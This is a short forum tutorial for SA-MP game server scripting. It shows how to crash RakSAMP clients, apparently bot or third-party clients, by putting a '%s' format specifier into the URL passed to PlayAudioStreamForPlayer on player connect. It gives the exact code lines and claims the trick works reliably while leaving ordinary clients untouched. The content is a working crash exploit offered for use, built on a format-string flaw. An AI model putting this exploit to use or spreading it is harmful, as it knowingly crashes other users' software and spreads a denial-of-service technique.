[Tutorial]Crash RakSAMP Clients
Hey, we can crash RakSamp clients by passing null string inside audio stream which Crashs RakSamp Clients, which doesn't affect sa-mp clients so we can use this by simply adding "%s" into PlayAudioStreamForPlayer
such as
put these codes under OnPlayerConnect
PlayAudioStreamForPlayer(playerid, "test.com/player%sdata"); // it can work in any url doens't need to be a vaild one
or simply
PlayAudioStreamForPlayer(playerid, "%s");
and then stopping it using
StopAudioStreamForPlayer(playerid);
tested 100% accurate and has no effect on samp clients